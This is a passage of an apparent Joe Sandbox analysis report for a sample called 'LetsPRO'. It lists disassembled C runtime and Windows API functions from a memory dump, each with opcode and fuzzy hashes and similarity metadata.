                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: HeadInitializeList$??2@_memsetmalloc
                                        • String ID:
                                        • API String ID: 2874038712-0
                                        • Opcode ID: f546ec30a7dfaf087c02bf343d4e36f76351221ebb9d048f8d213064db545c7a
                                        • Instruction ID: 61771e563082105b8239a8271b6e933faa4be817deafa48915802863ba25d54d
                                        • Opcode Fuzzy Hash: f546ec30a7dfaf087c02bf343d4e36f76351221ebb9d048f8d213064db545c7a
                                        • Instruction Fuzzy Hash: F0214CB1201B009FD364CF3ED984A67F7E8BF88314B514A1EE19AC7AA0D771F8418B14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C917C06 Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,?), ref: 6C917C39
                                        • _calloc_crt.MSVCR100(00000001,00000002), ref: 6C927A26
                                        • _errno.MSVCR100 ref: 6C927A33
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory_calloc_crt_errno
                                        • String ID:
                                        • API String ID: 1856998256-0
                                        • Opcode ID: 34b0866075c6478799dac032c47098c2e33f915013bb9c20af9365164877b1a2
                                        • Instruction ID: 2e8b0d3e0666bfea2a9ac8999cc2f20f13b31e434ccff685ed43dde468721c67
                                        • Opcode Fuzzy Hash: 34b0866075c6478799dac032c47098c2e33f915013bb9c20af9365164877b1a2
                                        • Instruction Fuzzy Hash: 30212B71A4522EDBD7105F69CCC5BDD73B8AF61318F12029DD405B7B80CB75CE848AA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90CDC0 Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • _fileno.MSVCR100(?,?,?,?,?,6C9130F1,?), ref: 6C90CE0D
                                        • _read.MSVCR100(00000000,?,?,?,?,6C9130F1,?), ref: 6C90CE14
                                        • _fileno.MSVCR100(?), ref: 6C90CE37
                                        • _fileno.MSVCR100(?), ref: 6C90CE47
                                        • _fileno.MSVCR100(?), ref: 6C90CE58
                                        • _fileno.MSVCR100(?,?), ref: 6C90CE68
                                        • _errno.MSVCR100(?,?,6C9130F1,?), ref: 6C92875C
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C9130F1,?), ref: 6C928767
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _fileno$_errno_invalid_parameter_noinfo_read
                                        • String ID:
                                        • API String ID: 2022966298-0
                                        • Opcode ID: c836084d5124b6fa12f9e021ed758e2502fd171fa2d4a713fbe83ec09ed114a8
                                        • Instruction ID: 3d62a079293cc9d9c702b385b0ff0f535548b5adef5bc45e66276b3374e7c2b9
                                        • Opcode Fuzzy Hash: c836084d5124b6fa12f9e021ed758e2502fd171fa2d4a713fbe83ec09ed114a8
                                        • Instruction Fuzzy Hash: 8F112432509B005ED7251F25D805A9A77ECEF1372CB20461EE8F996E90DB34E5528BC8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C947E40 Relevance: 9.1, APIs: 6, Instructions: 70synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C947E47
                                        • WaitForSingleObject.KERNEL32(?,00000000,00000010,6C947DB7), ref: 6C947E5D
                                        • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100 ref: 6C947E7A
                                        • CloseHandle.KERNEL32(?), ref: 6C947EFA
                                        • CloseHandle.KERNEL32(00000000), ref: 6C947F03
                                        • ??3@YAXPAX@Z.MSVCR100(?), ref: 6C947F06
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseHandle$??3@AcquireConcurrency@@H_prolog3Lock@details@ObjectReaderSingleWaitWrite@_Writer
                                        • String ID:
                                        • API String ID: 1148406726-0
                                        • Opcode ID: f353a0ad1a91175c8f70261e7fdd04965d84829ac1ca49f0dfbc739d66cc71a4
                                        • Instruction ID: 09b5683ba14d557931b92f464dbbcb7776aa4ea60477eac48635fbf5bc0ccec3
                                        • Opcode Fuzzy Hash: f353a0ad1a91175c8f70261e7fdd04965d84829ac1ca49f0dfbc739d66cc71a4
                                        • Instruction Fuzzy Hash: 7621A171A00209CFDF14CF69C940A9BB7B8FF51328B158659E865ABBA1DB30ED05CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C97CEF2 Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C97CEFF
                                        • _errno.MSVCR100 ref: 6C97CF3B
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97CF0A
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100 ref: 6C97CF1B
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97CF26
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97CF46
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                        • String ID:
                                        • API String ID: 1328987296-0
                                        • Opcode ID: 2390a9b0f3207d7e95efc5384f1d8e9dab5d018b141a8f37a70f781ce57fb69e
                                        • Instruction ID: 2d8f953417e4bb7b9222fa8e66e666723c376068531f881728618b4feebfe7da
                                        • Opcode Fuzzy Hash: 2390a9b0f3207d7e95efc5384f1d8e9dab5d018b141a8f37a70f781ce57fb69e
                                        • Instruction Fuzzy Hash: B0118C7160A10AEFCF307FA9EC905CA7B79EF6135CB240479ED5492A00DB31D664C6B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C97CE69 Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C97CE76
                                        • _errno.MSVCR100 ref: 6C97CEB2
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97CE81
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100 ref: 6C97CE92
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97CE9D
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97CEBD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                        • String ID:
                                        • API String ID: 1328987296-0
                                        • Opcode ID: 44f8b1ff98b64dd88a96bc2135c49c326ad917957a3e1c25bfc0a715f93efbe5
                                        • Instruction ID: 625555721a3ecb41e6632b189eb8f2305b2afe933e8dc75297b0c06eceb59d46
                                        • Opcode Fuzzy Hash: 44f8b1ff98b64dd88a96bc2135c49c326ad917957a3e1c25bfc0a715f93efbe5
                                        • Instruction Fuzzy Hash: E7014032646A05DFDB326F55DC805EB37A8FFA17A9B340525E45496940EB32CC84C7B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C911955 Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT(00000000,00000000,00000000,00000000,?,6C91746A,00000000,00000000,00000000,0000003D,?,6C917486,7591DF80,00000000,021F17E8), ref: 6C91196B
                                        • calloc.MSVCR100(00000001,00000002,00000000,00000000,00000000,00000000,?,6C91746A,00000000,00000000,00000000,0000003D,?,6C917486,7591DF80,00000000), ref: 6C911976
                                        • wcscpy_s.MSVCR100(00000000,00000001,00000000,7591DF80,00000000,021F17E8), ref: 6C911989
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,7591DF80,00000000,021F17E8), ref: 6C9297E9
                                        • _errno.MSVCR100 ref: 6C929800
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C92980A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __invoke_watson_errno_invalid_parameter_noinfo_wcslencallocwcscpy_s
                                        • String ID:
                                        • API String ID: 2624155197-0
                                        • Opcode ID: 761274cc1301cd7e4066ff88831250bf9e4f208ffc17276712c53812e8526362
                                        • Instruction ID: b86d787a836de8b1f4a62ab01dde4c7202b084e189fb245a8f92bc39b83203c0
                                        • Opcode Fuzzy Hash: 761274cc1301cd7e4066ff88831250bf9e4f208ffc17276712c53812e8526362
                                        • Instruction Fuzzy Hash: FCF0F436345518BBCB211E65AC88DCE366D9FA6BA8B054039FA1896E01D735C60982E5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90A76B Relevance: 9.1, APIs: 6, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __doserrno.MSVCR100(6C90A7F0,00000010), ref: 6C90A814
                                        • __doserrno.MSVCR100(6C90A7F0,00000010), ref: 6C92F526
                                        • _errno.MSVCR100(6C90A7F0,00000010), ref: 6C92F52E
                                        • _errno.MSVCR100(6C90A7F0,00000010), ref: 6C92F544
                                        • _invalid_parameter_noinfo.MSVCR100(6C90A7F0,00000010), ref: 6C92F54F
                                        • _errno.MSVCR100(6C90A7F0,00000010), ref: 6C92F556
                                          • Part of subcall function 6C90A51F: EnterCriticalSection.KERNEL32(00000108,6C90A580,0000000C,6C90ECA7,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?), ref: 6C90A570
                                          • Part of subcall function 6C90A6FA: _get_osfhandle.MSVCR100(?,?,?,?,6C90A7D5,?,6C90A7F0,00000010), ref: 6C90A705
                                          • Part of subcall function 6C90A6FA: _get_osfhandle.MSVCR100(?), ref: 6C90A728
                                          • Part of subcall function 6C90A6FA: CloseHandle.KERNEL32(00000000), ref: 6C90A72F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$__doserrno_get_osfhandle$CloseCriticalEnterHandleSection_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1720121285-0
                                        • Opcode ID: 8a6422604351c0cb2787cd8a1c0fb7a7a97a0fac7931b698b388370425fb10c0
                                        • Instruction ID: d2338aeb734816f9b44ce02cfe869a6dc76b6710c041fba464a94c4260e48f2e
                                        • Opcode Fuzzy Hash: 8a6422604351c0cb2787cd8a1c0fb7a7a97a0fac7931b698b388370425fb10c0
                                        • Instruction Fuzzy Hash: 50118F71A156448BD711CFA8C8807AD36B47F3232DF215288C4345BAD1CF79C9498BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90A84F Relevance: 9.0, APIs: 6, Instructions: 44COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __freebuf.LIBCMT ref: 6C90A873
                                          • Part of subcall function 6C90A81E: free.MSVCR100(?,?,?,6C90A878,?,?), ref: 6C90A835
                                        • _fileno.MSVCR100(?,?,?), ref: 6C90A879
                                        • _close.MSVCR100(00000000,?,?,?), ref: 6C90A87F
                                        • _errno.MSVCR100 ref: 6C928BE4
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C928BEF
                                          • Part of subcall function 6C90A5D5: _fileno.MSVCR100(?,?,?,?,?,?,?,6C90A870,?), ref: 6C90A604
                                          • Part of subcall function 6C90A5D5: _write.MSVCR100(00000000,?,?,?,?,?,?,6C90A870,?), ref: 6C90A60B
                                        • free.MSVCR100(?), ref: 6C928C04
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _filenofree$__freebuf_close_errno_invalid_parameter_noinfo_write
                                        • String ID:
                                        • API String ID: 1941134952-0
                                        • Opcode ID: 5fd887b797e5120fb494945be3f12b5369408b826fa08db580b0cde284b7dbef
                                        • Instruction ID: bec8561b16bd7443a53122dcaec010087066b29c6758eb1968d1065a255f5adf
                                        • Opcode Fuzzy Hash: 5fd887b797e5120fb494945be3f12b5369408b826fa08db580b0cde284b7dbef
                                        • Instruction Fuzzy Hash: F7F0F432B12B105AD3201A3A4C00B9B76EC7FB2279F18469DDD6993EC0EF38D00746E4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C952232 Relevance: 9.0, APIs: 6, Instructions: 42COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(00000000,00000000,?,6C9523AA,6C9A5F58,?,?,?,00000000), ref: 6C95223F
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,6C9523AA,6C9A5F58,?,?,?,00000000), ref: 6C95224A
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __cenvarg.LIBCMT ref: 6C95226B
                                        • __dospawn.LIBCMT ref: 6C952285
                                        • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C95228F
                                        • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C952297
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$__cenvarg__dospawn_errno_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1531270514-0
                                        • Opcode ID: 1a54c8550cb20d6adf50240f848b0d0809d2662734f983268f4b40b89e3852d0
                                        • Instruction ID: 5d5a3f5bc6dec1a340163c50b02e9122e09768ca360b9fb37d241096ae21fc3c
                                        • Opcode Fuzzy Hash: 1a54c8550cb20d6adf50240f848b0d0809d2662734f983268f4b40b89e3852d0
                                        • Instruction Fuzzy Hash: F7016275900048FBCF019F90CC049CD7A79EF25368F504290F925615A0D771CB64DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C951B9A Relevance: 9.0, APIs: 6, Instructions: 42COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(00000000,00000000,?,6C951D0E,?,000000FF,?,00000000,00000000), ref: 6C951BA7
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,6C951D0E,?,000000FF,?,00000000,00000000), ref: 6C951BB2
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __cenvarg.LIBCMT ref: 6C951BD3
                                        • __dospawn.LIBCMT ref: 6C951BEC
                                        • free.MSVCR100(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C951BF6
                                        • free.MSVCR100(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C951BFE
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$__cenvarg__dospawn_errno_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1531270514-0
                                        • Opcode ID: fcf98d1d312cc394a8a3b5fdd4c95ce95f0d8ebab150f57f2f357f958c101d70
                                        • Instruction ID: 6e56b8b1444ef959a65ec2de5d7c8b5f626eded604d7892da9c53f9ea8ea2bf1
                                        • Opcode Fuzzy Hash: fcf98d1d312cc394a8a3b5fdd4c95ce95f0d8ebab150f57f2f357f958c101d70
                                        • Instruction Fuzzy Hash: A3011D75900108FBCF019FA4CC05ADD7AB9AF26368F5042A4F929655A0E772CBA4DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C917DBA Relevance: 9.0, APIs: 6, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(?,?,?,6C917D65,?,?,00000104,?), ref: 6C917DC1
                                        • _errno.MSVCR100(?,?,?,6C917D65,?,?,00000104,?), ref: 6C917DC8
                                        • _wfullpath.MSVCR100(?,?,?,?,?,?,6C917D65,?,?,00000104,?), ref: 6C917DD9
                                          • Part of subcall function 6C9039FD: GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6C903A42
                                        • _errno.MSVCR100 ref: 6C917DE3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$FullNamePath_wfullpath
                                        • String ID:
                                        • API String ID: 3755888649-0
                                        • Opcode ID: 43b0713dd001a0a183a34357f7714667dba7ce741be4903f334adfa59e896bb4
                                        • Instruction ID: ce5722b994c994bda6c19a3295b87df62ef79cd56cc4714db4393e77de6ada51
                                        • Opcode Fuzzy Hash: 43b0713dd001a0a183a34357f7714667dba7ce741be4903f334adfa59e896bb4
                                        • Instruction Fuzzy Hash: BCF06D36240648EFCB021F64C801B9D3B65FFA2364F1104A4E8185BA21DB32D819C7A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9478BC Relevance: 9.0, APIs: 6, Instructions: 31synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InterlockedFlushSList.KERNEL32(?,00000000,6C9478A9), ref: 6C9478C3
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?), ref: 6C9478D7
                                        • SetEvent.KERNEL32(?), ref: 6C9478E4
                                        • CloseHandle.KERNEL32(?), ref: 6C9478FA
                                        • CloseHandle.KERNEL32(?), ref: 6C9478FE
                                        • ??3@YAXPAX@Z.MSVCR100(?), ref: 6C947901
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseHandle$??3@EventFlushInterlockedListObjectSingleWait
                                        • String ID:
                                        • API String ID: 751808093-0
                                        • Opcode ID: 5334cc5a6c9885032a604840df63ad280535a0568a9519afc777cf40c661e359
                                        • Instruction ID: a7fa32be40868f80215632ae669671651609b62892def6587b07d21b8e14895d
                                        • Opcode Fuzzy Hash: 5334cc5a6c9885032a604840df63ad280535a0568a9519afc777cf40c661e359
                                        • Instruction Fuzzy Hash: C0F082769051209BCF221B15EC88D4ABFB9FF9A3743150666F86457354CA31CC90CAE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C910AA0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(00000000,00000000,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C915C68
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C92A1F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID: $
                                        • API String ID: 2959964966-3993045852
                                        • Opcode ID: a682c3790449c3718d919bbe8aabbd3d85e827ce1a52583cb9429d1daa757927
                                        • Instruction ID: 987ba6f52c0fd448d06c7b2c6b888ed43cdc9505c2b5d865374af222dcd4fa0f
                                        • Opcode Fuzzy Hash: a682c3790449c3718d919bbe8aabbd3d85e827ce1a52583cb9429d1daa757927
                                        • Instruction Fuzzy Hash: 1D71F53199A28DCBDF11CF58C4467AE7BB4BB0231CF24025AD8A057D95C73ACAA1C791
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C900BCA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 178COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • iswctype.MSVCR100(?,00000008,?,?,?,?,?,?,6C900D05,?,?,?,00000000), ref: 6C900C13
                                        • _errno.MSVCR100(?,?,?,?,6C900D05,?,?,?,00000000), ref: 6C90A464
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,6C900D05,?,?,?,00000000), ref: 6C92A423
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
